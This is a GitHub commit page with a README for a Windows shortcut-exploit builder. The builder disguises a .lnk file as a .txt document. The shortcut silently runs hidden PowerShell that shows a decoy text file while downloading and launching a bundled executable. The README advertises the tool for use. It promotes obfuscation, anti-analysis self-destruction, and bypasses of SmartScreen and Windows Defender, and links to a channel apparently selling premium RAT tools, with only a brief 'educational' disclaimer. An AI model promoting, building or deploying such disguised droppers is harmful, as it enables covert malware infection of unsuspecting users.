Skip to content

Commit 3681d72

Browse files
Update README.md
1 parent d1aa1ac commit 3681d72

File tree

1 file changed

+38
-2
lines changed

1 file changed

+38
-2
lines changed

README.md

+38-2
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,38 @@
1-
# LNK-Exploit
2-
🌐An lnk exploit (fake txt) for starting files with other extensions silently. Works on Windows 7 or higher
1+
# Lnk exploit builder for Windows
2+
The exploit generates a fake .txt file with a backdoor. The main idea is executing an exe/bat file silently. Important: the script is for education purposes only. You can use the provided code to create your own project or fork this repository and add any improvements
3+
<br>Feel free to leave a ⭐️ to this repo if you like it. You might also be interested in our Premium tools, feel free to check **@milleniumrat** telegram channel
4+
5+
### 1) What does the user see before launching the file (file extension view is enabled):
6+
![image](https://github.com/user-attachments/assets/04d78324-620d-45db-88c5-05837874e959)
7+
8+
### 2) What does the user see after launching the file:
9+
![image](https://github.com/user-attachments/assets/0a2b7472-49b3-48fb-9525-fcb581bbf02c)
10+
11+
### 3) What exactly happens:
12+
The .lnk invokes a hidden powershell console ➡️ The powershell script downloads/create a txt file with the same name and opens it in Notepad + downloads,saves and starts the exe file you`ve binded
13+
## Features:
14+
<br>✅NEW: additional link encoding and obfuscating
15+
<br>✅Easy-to use builder
16+
<br>✅Fake description generator
17+
<br>✅Hiding the backdoor code deep inside the binary. It is impossible to see the file content in the properties string (see the screenshot below)
18+
<br>✅Txt downloading option for long text files
19+
<br>✅Silent powershell console on background
20+
<br>✅Anti-analyzing - any change of properties will turn the infected file into a harmless one, all the malicious code will be destroyed
21+
<br>✅Bypassing Windows SmartScreen alert (the application will be started by another (trusted) application)
22+
<br>✅Windows Defender doesn`t block or delete the generated file
23+
24+
## Extra Screenshots:
25+
### Builder:
26+
![image](https://github.com/user-attachments/assets/82256fed-fe27-481b-ac6a-d0fbf9701882)
27+
28+
### Properties window of an infected file, the "Target" string look like it is be empty:
29+
![image](https://github.com/user-attachments/assets/dd7322d8-17b2-4c21-86fc-b0bb40b1eb98)
30+
31+
## Building:
32+
<br>🔹Start **install_python.bat** if Python isn`t already installed on your PC or your Python version isn`t compatible with this script
33+
<br>🔹Once Python 3.10 is installed, run **lnk-compiler.exe** (you can also generate the compiler yourself openening the **lnk-compiler.sln** project solution and pressing CNTRL+B)
34+
<br>🔹Wait for the building to be completed
35+
<br>🔹**main.exe** in the **dist** directory is the ready file
36+
37+
# 🛑Disclaimer: I don`t take the resposiblity for any illegal actions realized with the help of this tool, it was made for educational purposes, testing or cybersecurity researchs. Please, be nice
38+

0 commit comments

Comments
 (0)